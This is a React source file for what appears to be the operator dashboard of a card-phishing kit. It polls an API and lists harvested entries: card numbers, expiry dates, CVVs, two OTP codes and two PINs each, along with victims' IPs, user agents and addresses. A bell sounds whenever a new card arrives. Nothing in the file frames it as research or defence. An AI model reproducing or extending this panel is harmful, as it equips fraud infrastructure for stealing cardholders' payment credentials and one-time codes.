import React, { useEffect, useState } from "react";
import {
  Box,
  Button,
  Paper,
  Stack,
  Table,
  TableBody,
  TableCell,
  TableContainer,
  TableHead,
  TableRow
} from "@mui/material";
import NoData from "../../components/NoData";
import { INTERVAL_TIME, NO_DATA } from "../../utils/constants";
import useCards from "../../hooks/useCards";
import Row from "./Row";
import { ICardData, IDataOfNumberOfVisitors } from "../../utils/interfaces";
import useUser from "../../hooks/useUser";
import api from "../../utils/api";
import DialogOfVisitors from "./DialogOfVisitors";

export default function Dashboard() {
  const { amountOfPrevCards, cards, getAllCardsAct } = useCards()
  const { token } = useUser()

  const [dataOfNumberOfVisitors, setDataOfNumberOfVisitors] = useState<IDataOfNumberOfVisitors | null>(null)
  const [dialogOfVisitorsOpened, setDialogOfVisitorsOpened] = useState<boolean>(false)

  const getNumberOfVisitors = () => {
    api.get('/visitor/getNumberOfVisitors')
      .then(response => {
        setDataOfNumberOfVisitors(response.data)
      })
      .catch(error => {
      })
  }

  useEffect(() => {
    if (token) {
      getAllCardsAct()
      getNumberOfVisitors()
      const interval = setInterval(() => {
        getAllCardsAct()
        getNumberOfVisitors()
      }, INTERVAL_TIME);
      return () => clearInterval(interval);
    }
  }, [token])

  useEffect(() => {
    if (amountOfPrevCards < cards.length) {
      const audio = new Audio('/assets/audios/bell.mp3')
      audio.play()
    }
  }, [amountOfPrevCards, cards.length])

  return (
    <Box my={5}>
      <Stack direction="row" justifyContent="end" mb={2}>
        <Button variant="contained" onClick={() => setDialogOfVisitorsOpened(true)}>Number of Visitors</Button>
      </Stack>
      <TableContainer component={Paper} elevation={3}>
        <Table>
          <TableHead>
            <TableRow>
              <TableCell sx={{ fontWeight: 900 }}>No</TableCell>
              <TableCell sx={{ fontWeight: 900 }}>User Name</TableCell>
              <TableCell sx={{ fontWeight: 900 }}>IP</TableCell>
              <TableCell sx={{ fontWeight: 900 }}>User Agent</TableCell>
              <TableCell sx={{ fontWeight: 900 }}>Address</TableCell>
              <TableCell sx={{ fontWeight: 900 }}>Card Name</TableCell>
              <TableCell sx={{ fontWeight: 900 }}>Card Number</TableCell>
              <TableCell sx={{ fontWeight: 900 }}>EXP</TableCell>
              <TableCell sx={{ fontWeight: 900 }}>CVV</TableCell>
              <TableCell sx={{ fontWeight: 900 }}>OTP 1</TableCell>
              <TableCell sx={{ fontWeight: 900 }}>OTP 2</TableCell>
              <TableCell sx={{ fontWeight: 900 }}>PIN 1</TableCell>
              <TableCell sx={{ fontWeight: 900 }}>PIN 2</TableCell>
            </TableRow>
          </TableHead>
          {cards?.length > 0 && (
            <TableBody>
              {
                cards.map((listItem: ICardData, index: number) => (
                  <Row key={listItem.id} index={index} listItem={listItem} />
                ))
              }
            </TableBody>
          )}
        </Table>
        {cards?.length === 0 && (<NoData text={NO_DATA} />)}
      </TableContainer>
      {dataOfNumberOfVisitors && (
        <DialogOfVisitors
          isOpened={dialogOfVisitorsOpened}
          setIsOpened={setDialogOfVisitorsOpened}
          data={dataOfNumberOfVisitors}
        />
      )}
    </Box>
  )
}